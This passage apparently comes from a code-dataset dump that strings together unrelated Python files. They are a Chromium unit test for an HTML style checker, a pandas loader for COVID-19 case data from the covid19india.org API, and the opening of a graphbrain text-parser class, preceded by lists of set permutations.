{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), a(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), a(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), a(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), a(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), a(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), b(6), a(5), a(4), a(3), a(2), a(1)}
"""
|
py | 1a37f46ac3449c96f35331649f88d063cc1f7420 | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import html_checker
from os import path as os_path
import re
from sys import path as sys_path
import test_util
import unittest
_HERE = os_path.dirname(os_path.abspath(__file__))
sys_path.append(os_path.join(_HERE, '..', '..', '..', 'build'))
import find_depot_tools # pylint: disable=W0611
from testing_support.super_mox import SuperMoxTestBase
class HtmlCheckerTest(SuperMoxTestBase):
def setUp(self):
SuperMoxTestBase.setUp(self)
input_api = self.mox.CreateMockAnything()
input_api.re = re
output_api = self.mox.CreateMockAnything()
self.checker = html_checker.HtmlChecker(input_api, output_api)
def ShouldFailCheck(self, line, checker):
"""Checks that the |checker| flags |line| as a style error."""
error = checker(1, line)
self.assertNotEqual('', error, 'Should be flagged as style error: ' + line)
highlight = test_util.GetHighlight(line, error).strip()
def ShouldPassCheck(self, line, checker):
"""Checks that the |checker| doesn't flag |line| as a style error."""
error = checker(1, line)
self.assertEqual('', error, 'Should not be flagged as style error: ' + line)
def testClassesUseDashFormCheckFails(self):
lines = [
' <a class="Foo-bar" href="classBar"> ',
'<b class="foo-Bar"> ',
'<i class="foo_bar" >',
' <hr class="fooBar"> ',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.ClassesUseDashFormCheck)
def testClassesUseDashFormCheckPasses(self):
lines = [
' class="abc" ',
'class="foo-bar"',
'<div class="foo-bar" id="classBar"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.ClassesUseDashFormCheck)
def testSingleQuoteCheckFails(self):
lines = [
""" <a href='classBar'> """,
"""<a foo$="bar" href$='classBar'>""",
"""<a foo="bar" less="more" href='classBar' kittens="cats">""",
"""<a cats href='classBar' dogs>""",
"""<a cats\n href='classBat\nclassBaz'\n dogs>""",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotUseSingleQuotesCheck)
def testSingleQuoteCheckPasses(self):
lines = [
"""<b id="super-valid">SO VALID!</b>""",
"""<a text$="i ain't got invalid quotes">i don't</a>""",
"""<span>[[i18n('blah')]]</span> """,
"""<a cats href="classBar" dogs>""",
"""<a cats\n href="classBar"\n dogs>""",
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotUseSingleQuotesCheck)
def testDoNotCloseSingleTagsCheckFails(self):
lines = [
"<input/>",
' <input id="a" /> ',
"<div/>",
"<br/>",
"<br />",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotCloseSingleTagsCheck)
def testDoNotCloseSingleTagsCheckPasses(self):
lines = [
"<input>",
"<link>",
"<div></div>",
'<input text="/">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotCloseSingleTagsCheck)
def testDoNotUseBrElementCheckFails(self):
lines = [
" <br>",
"<br > ",
"<br\>",
'<br name="a">',
]
for line in lines:
self.ShouldFailCheck(
line, self.checker.DoNotUseBrElementCheck)
def testDoNotUseBrElementCheckPasses(self):
lines = [
"br",
"br>",
"give me a break"
]
for line in lines:
self.ShouldPassCheck(
line, self.checker.DoNotUseBrElementCheck)
def testDoNotUseInputTypeButtonCheckFails(self):
lines = [
'<input type="button">',
' <input id="a" type="button" >',
'<input type="button" id="a"> ',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotUseInputTypeButtonCheck)
def testDoNotUseInputTypeButtonCheckPasses(self):
lines = [
"<input>",
'<input type="text">',
'<input type="result">',
'<input type="submit">',
"<button>",
'<button type="button">',
'<button type="reset">',
'<button type="submit">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotUseInputTypeButtonCheck)
def testI18nContentJavaScriptCaseCheckFails(self):
lines = [
' i18n-content="foo-bar" ',
'i18n-content="foo_bar"',
'i18n-content="FooBar"',
'i18n-content="_foo"',
'i18n-content="foo_"',
'i18n-content="-foo"',
'i18n-content="foo-"',
'i18n-content="Foo"',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.I18nContentJavaScriptCaseCheck)
def testI18nContentJavaScriptCaseCheckPasses(self):
lines = [
' i18n-content="abc" ',
'i18n-content="fooBar"',
'i18n-content="validName" attr="invalidName_"',
'<div i18n-content="exampleTitle"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.I18nContentJavaScriptCaseCheck)
def testLabelCheckFails(self):
lines = [
' <label for="abc"',
" <label for= ",
" <label\tfor= ",
' <label\n blah="1" blee="3"\n for="goop"',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.LabelCheck)
def testLabelCheckPass(self):
lines = [
' my-for="abc" ',
' myfor="abc" ',
" <for",
' <paper-tooltip for="id-name"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.LabelCheck)
if __name__ == '__main__':
unittest.main()
|
py | 1a37f4c94fafcde1d52997086287d9a243587766 | import pandas as pd
import datetime
import copy
import requests
from data.dataloader.base import BaseLoader
class Covid19IndiaLoader(BaseLoader):
"""Dataloader that gets casecount data from 'https://api.covid19india.org'
We use the JSON api and not the CSV api
Different API are accessed and then converted into pd.DataFrames
Full list of dataframes are given in the docstrings of pull_dataframes
Args:
BaseLoader (abstract class): Abstract Data Loader Class
"""
def __init__(self):
super().__init__()
def _load_data_json(self):
"""Returns dataframes from data.json
df_tested : dataframe of testing data
df_statewise : dataframe of statewise data (today's snapshot)
df_india_time_series : dataframe of india cases (time series)
Returns:
[pd.DataFrame]: list of dataframes
"""
# Parse data.json file
data = requests.get('https://api.covid19india.org/data.json').json()
# Create dataframe for testing data
df_tested = pd.DataFrame.from_dict(data['tested'])
# Create dataframe for statewise data
df_statewise = pd.DataFrame.from_dict(data['statewise'])
# Create dataframe for time series data
df_india_time_series = pd.DataFrame.from_dict(data['cases_time_series'])
df_india_time_series['date'] = pd.to_datetime([datetime.datetime.strptime(
x.split(' ')[0] + ' ' + x.split(' ')[1][:3] + ' 2020', '%d %b %Y') for x in
df_india_time_series['date']])
return df_tested, df_statewise, df_india_time_series
def _load_state_district_wise_json(self):
"""Loads dataframes from the state_district_wise.json file
df_districtwise : Today's snapshot of district-wise cases
statecode_to_state_dict : Mapping statecode to state name
Returns:
pd.DataFrame, dict: df_districtwise, statecode_to_state_dict
"""
# Load state_district_wise.json file
data = requests.get('https://api.covid19india.org/state_district_wise.json').json()
# Create statecode_to_state_dict
df_statecode = pd.DataFrame.from_dict(data)
df_statecode = df_statecode.drop(['districtData']).T
statecode_to_state_dict = dict(
zip(df_statecode['statecode'], df_statecode.index))
# Create df_districtwise
states = data.keys()
for state in states:
for district, district_dict in data[state]['districtData'].items():
delta_dict = dict([('delta_'+k, v)
for k, v in district_dict['delta'].items()])
data[state]['districtData'][district].update(delta_dict)
del data[state]['districtData'][district]['delta']
columns = ['state', 'district', 'active', 'confirmed', 'deceased',
'recovered', 'migratedother', 'delta_confirmed', 'delta_deceased',
'delta_recovered']
df_districtwise = pd.DataFrame(columns=columns)
for state in states:
df = pd.DataFrame.from_dict(
data[state]['districtData']).T.reset_index()
del df['notes']
df.rename({'index': 'district'}, axis=1, inplace=True)
df['state'] = state
df = df[columns]
df_districtwise = pd.concat([df_districtwise, df], ignore_index=True)
return df_districtwise, statecode_to_state_dict
def _load_raw_data_json(self, NUM_RAW_DFS=30):
"""Loads raw_data from raw_data{i}.json
df_raw : patient level information
Args:
NUM_RAW_DFS (int, optional): Number of raw data json files to consider. Defaults to 30.
"""
# Parse raw_data.json file
raw_data_dataframes = []
for i in range(1, NUM_RAW_DFS+1):
try:
data = requests.get(f'https://api.covid19india.org/raw_data{i}.json').json()
raw_data_dataframes.append(pd.DataFrame.from_dict(data['raw_data']))
except Exception:
break
df_raw = pd.concat(raw_data_dataframes, ignore_index=True)
return df_raw
def _load_districts_daily_json(self):
"""Loads history of cases district wise from districts_daily.json
Returns:
pd.DataFrame: df_districts
"""
data = requests.get('https://api.covid19india.org/districts_daily.json').json()
df_districts = pd.DataFrame(columns=['notes', 'active', 'confirmed', 'deceased',
'recovered', 'date', 'state', 'district'])
for state in data['districtsDaily'].keys():
for dist in data['districtsDaily'][state].keys():
df = pd.DataFrame.from_dict(data['districtsDaily'][state][dist])
df['state'] = state
df['district'] = dist
df_districts = pd.concat([df_districts, df], ignore_index=True)
df_districts = df_districts[['state', 'district', 'date',
'active', 'confirmed', 'deceased', 'recovered', 'notes']]
numeric_cols = ['active', 'confirmed', 'deceased', 'recovered']
df_districts[numeric_cols] = df_districts[numeric_cols].apply(
pd.to_numeric)
return df_districts
def _load_data_all_json_district(self, statecode_to_state_dict):
"""Loads history of cases district wise from data-all.json
Args:
statecode_to_state_dict (dict): dict mapping state code to state name
Returns:
pd.DataFrame: df_districts_all
"""
data = requests.get('https://api.covid19india.org/v4/data-all.json').json()
for date in data.keys():
date_dict = data[date]
# Remove all the states which don't have district data in them
date_dict = {state : state_dict for state, state_dict in date_dict.items() \
if 'districts' in state_dict.keys()}
data[date] = date_dict
# Remove all the dates which have 0 states with district data after pruning
data = {date : date_dict for date, date_dict in data.items() if len(date_dict) > 0}
# Make the districts key data the only data available for the state key
for date in data.keys():
for state in data[date].keys():
# Make the districts key dict the main dict itself for a particular date, state
data[date][state] = data[date][state]['districts']
state_dict = data[date][state]
# Keep only those district dicts for which cumulative data (total key) is available
state_dict = {dist : dist_dict for dist, dist_dict in state_dict.items() \
if 'total' in dist_dict.keys()}
data[date][state] = state_dict
# Make the total key dict the main dict itself for a particular date, state, dist
for district in data[date][state].keys():
data[date][state][district] = data[date][state][district]['total']
# For a particular date, state, dist, only keep those keys for which have confirmed, recovered, deceased are all available
state_dict = {dist: dist_dict for dist, dist_dict in state_dict.items() \
if {'confirmed', 'recovered', 'deceased'} <= dist_dict.keys()}
data[date][state] = state_dict
# Remove all the states for a particular date which don't have district that satisfied above criteria
date_dict = data[date]
date_dict = {state : state_dict for state, state_dict in date_dict.items() if len(state_dict) > 0}
data[date] = date_dict
# Remove all the dates which have 0 states with district data after pruning
data = {date : date_dict for date, date_dict in data.items() if len(date_dict) > 0}
df_districts_all = pd.DataFrame(columns=['date', 'state', 'district', 'confirmed', 'active',
'recovered', 'deceased', 'tested', 'migrated'])
for date in data.keys():
for state in data[date].keys():
df_date_state = pd.DataFrame.from_dict(data[date][state]).T.reset_index()
df_date_state = df_date_state.rename({'index' : 'district'}, axis='columns')
df_date_state['active'] = df_date_state['confirmed'] - \
(df_date_state['recovered'] + df_date_state['deceased'])
df_date_state['state'] = statecode_to_state_dict[state]
df_date_state['date'] = date
df_districts_all = pd.concat([df_districts_all, df_date_state], ignore_index=True, sort=False)
numeric_cols = ['confirmed', 'active', 'recovered', 'deceased', 'tested', 'migrated']
df_districts_all.loc[:, numeric_cols] = df_districts_all.loc[:, numeric_cols].apply(pd.to_numeric)
return df_districts_all
def _load_data_all_json_state(self, statecode_to_state_dict):
"""Loads history of cases state wise from data-all.json
Args:
statecode_to_state_dict (dict): dict mapping state code to state name
Returns:
pd.DataFrame: df_state_all
"""
data = requests.get('https://api.covid19india.org/v4/data-all.json').json()
for date in data.keys():
date_dict = data[date]
# Remove all the states which don't have district data in them
date_dict = {state : state_dict for state, state_dict in date_dict.items() if 'districts' in state_dict.keys()}
data[date] = date_dict
# Remove all the dates which have 0 states with district data after pruning
data = {date : date_dict for date, date_dict in data.items() if len(date_dict) > 0}
# Make the districts key data the only data available for the state key
for date in data.keys():
for state in data[date].keys():
# Make the districts key dict the main dict itself for a particular date, state
data[date][state] = data[date][state]['total']
date_dict = {state: state_dict for state, state_dict in data[date].items() \
if {'confirmed', 'recovered', 'deceased'} <= state_dict.keys()}
data[date] = date_dict
# Remove all the dates which have 0 states with district data after pruning
data = {date: date_dict for date, date_dict in data.items() if len(date_dict) > 0}
df_states_all = pd.DataFrame(columns=['date', 'state', 'confirmed', 'active', 'recovered', 'deceased', 'tested', 'migrated'])
for date in data.keys():
df_date = pd.DataFrame.from_dict(data[date]).T.reset_index()
df_date = df_date.rename({'index': 'state'}, axis='columns')
df_date['active'] = df_date['confirmed'] - (df_date['recovered'] + df_date['deceased'])
df_date['state'] = pd.Series([statecode_to_state_dict[state_code] for state_code in df_date['state']])
df_date['date'] = date
df_states_all = pd.concat([df_states_all, df_date], ignore_index=True)
numeric_cols = ['confirmed', 'active', 'recovered', 'deceased', 'tested', 'migrated']
df_states_all.loc[:, numeric_cols] = df_states_all.loc[:, numeric_cols].apply(pd.to_numeric)
return df_states_all
def _load_districts_csv(self):
df = pd.read_csv('https://api.covid19india.org/csv/latest/districts.csv')
df.columns = [x.lower() for x in df.columns]
df['active'] = df['confirmed'] - (df['recovered'] + df['deceased'])
numeric_cols = ['confirmed', 'active',
'recovered', 'deceased', 'tested', 'other']
df.loc[:, numeric_cols] = df.loc[:, numeric_cols].apply(pd.to_numeric)
df = df.fillna(0)
df['date'] = pd.to_datetime(df['date'], format="%Y-%m-%d")
return df
def pull_dataframes(self, load_raw_data=False, load_districts_daily=False, **kwargs):
"""
This function parses multiple JSONs from covid19india.org
It then converts the data into pandas dataframes
It returns the following dataframes as a dict :
- df_tested : Time series of people tested in India
- df_statewise : Today's snapshot of cases in India, statewise
- df_india_time_series : Time series of cases in India (nationwide)
- df_districtwise : Today's snapshot of cases in India, districtwise
- df_raw_data : Patient level information of cases
- df_districts_daily : History of cases district wise obtained from districts_daily.json
- df_districts_all : History of cases district wise obtained from data_all.json
- df_states_all : History of cases state wise obtained from data_all.json
"""
# List of dataframes to return
dataframes = {}
df_tested, df_statewise, df_india_time_series = self._load_data_json()
dataframes['df_tested'] = df_tested
dataframes['df_statewise'] = df_statewise
dataframes['df_india_time_series'] = df_india_time_series
df_districtwise, statecode_to_state_dict = self._load_state_district_wise_json()
dataframes['df_districtwise'] = df_districtwise
if load_raw_data:
df_raw = self._load_raw_data_json()
dataframes['df_raw_data'] = df_raw
if load_districts_daily:
df_districts = self._load_districts_daily_json()
dataframes['df_districts_daily'] = df_districts
df_districts_all = self._load_data_all_json_district(statecode_to_state_dict)
dataframes['df_districts_all'] = df_districts_all
df_states_all = self._load_data_all_json_state(statecode_to_state_dict)
dataframes['df_states_all'] = df_states_all
df_districts = self._load_districts_csv()
dataframes['df_districts'] = df_districts
return dataframes
def pull_dataframes_cached(self, reload_data=False, label=None, **kwargs):
return super().pull_dataframes_cached(reload_data=reload_data, label=label, **kwargs)
def get_data(self, state='Maharashtra', district='Mumbai', use_dataframe='data_all',
reload_data=False, **kwargs):
"""Main function serving as handshake between data and fitting modules
Args:
state (str, optional): State to fit on. Defaults to 'Maharashtra'.
district (str, optional): District to fit on. If given, get_data_district is called.
Else, get_data_state is called. Defaults to 'Mumbai'.
use_dataframe (str, optional): Which dataframe to use for districts.
Can be data_all/districts_daily. Defaults to 'data_all'.
reload_data (bool, optional): arg for pull_dataframes_cached. If true, data is
pulled afresh, rather than using the cache. Defaults to False.
Returns:
dict { str : pd.DataFrame } : Processed dataframe
"""
if not district is None:
return {"data_frame": self.get_data_district(state, district, use_dataframe,
reload_data, **kwargs)}
else:
return {"data_frame": self.get_data_state(state, reload_data, **kwargs)}
def get_data_state(self, state='Delhi', reload_data=False, **kwargs):
"""Helper function for get_data. Returns state data
Args:
state (str, optional): State to fit on. Defaults to 'Delhi'.
reload_data (bool, optional): arg for pull_dataframes_cached. If true, data is
pulled afresh, rather than using the cache. Defaults to False.
Returns:
dict { str : pd.DataFrame } : Processed dataframe
"""
dataframes = self.pull_dataframes_cached(reload_data=reload_data, **kwargs)
df_states = copy.copy(dataframes['df_states_all'])
df_state = df_states[df_states['state'] == state]
df_state['date'] = pd.to_datetime(df_state['date'])
df_state = df_state.rename({'confirmed': 'total'}, axis='columns')
df_state.reset_index(inplace=True, drop=True)
return df_state
def get_data_district(self, state='Karnataka', district='Bengaluru',
use_dataframe='data_all', reload_data=False, **kwargs):
"""Helper function for get_data. Returns district data
Args:
state (str, optional): State to fit on. Defaults to 'Karnataka'.
district (str, optional): District to fit on. Defaults to 'Bengaluru'.
use_dataframe (str, optional) : Which dataframe to use. Can be `data_all`/`districts_daily`.
reload_data (bool, optional): arg for pull_dataframes_cached. If true, data is
pulled afresh, rather than using the cache. Defaults to False.
Returns:
dict { str : pd.DataFrame } : Processed dataframe
"""
dataframes = self.pull_dataframes_cached(reload_data=reload_data, **kwargs)
if use_dataframe == 'data_all':
df_districts = copy.copy(dataframes['df_districts_all'])
df_district = df_districts.loc[(df_districts['state'] == state) & (
df_districts['district'] == district)]
df_district.loc[:, 'date'] = pd.to_datetime(df_district.loc[:, 'date'])
df_district = df_district.rename({'confirmed': 'total'}, axis='columns')
del df_district['migrated']
df_district.reset_index(inplace=True, drop=True)
return df_district
if use_dataframe == 'districts_daily':
df_districts = copy.copy(dataframes['df_districts_daily'])
df_district = df_districts.loc[(df_districts['state'] == state) & (
df_districts['district'] == district)]
del df_district['notes']
df_district.loc[:, 'date'] = pd.to_datetime(df_district.loc[:, 'date'])
df_district = df_district.loc[df_district['date'] >= '2020-04-24', :]
df_district = df_district.rename({'confirmed': 'total'}, axis='columns')
df_district.reset_index(inplace=True, drop=True)
return df_district
|
py | 1a37f547ae843d38b3dd3d6f5aa0d2d040a4c785 | import sys
import logging
from collections import namedtuple
logging.basicConfig(stream=sys.stderr, level=logging.WARNING)
class Parser(object):
"""Defines the common interface for parser objects.
Parser transofrm natural text into graphbrain hyperedges.
"""
def __init__(self, lemmas=False):
self.lemmas = lemmas
self.atom2token = {}
self.cur_text = None
# to be created by derived classes
self.lang = None
self.nlp = None
# named tuple used to pass parser state internally
self._ParseState = namedtuple('_ParseState',
['extra_edges', 'tokens', 'child_tokens',
